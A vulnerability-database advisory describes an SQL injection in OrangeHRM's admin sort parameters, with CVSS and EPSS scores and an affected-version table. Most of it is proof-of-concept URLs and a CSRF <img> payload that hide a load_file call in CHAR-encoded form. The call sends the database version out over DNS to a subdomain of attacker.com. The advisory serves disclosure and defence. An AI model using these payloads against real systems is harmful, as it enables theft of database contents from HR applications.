6 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
38.9%
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in OrangeHRM, which could be exploited to alter SQL requests to application’s database.
version()
(or any other sensitive information from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortFi eld=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
The following PoC demonstrates exploitation of the vulnerability via CSRF vector:
<img src=“http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&s ortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))”>
1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortFi eld=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sort Field=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
CPE | Name | Operator | Version |
---|---|---|---|
orangehrm | le | 2.7.1-rc.1 |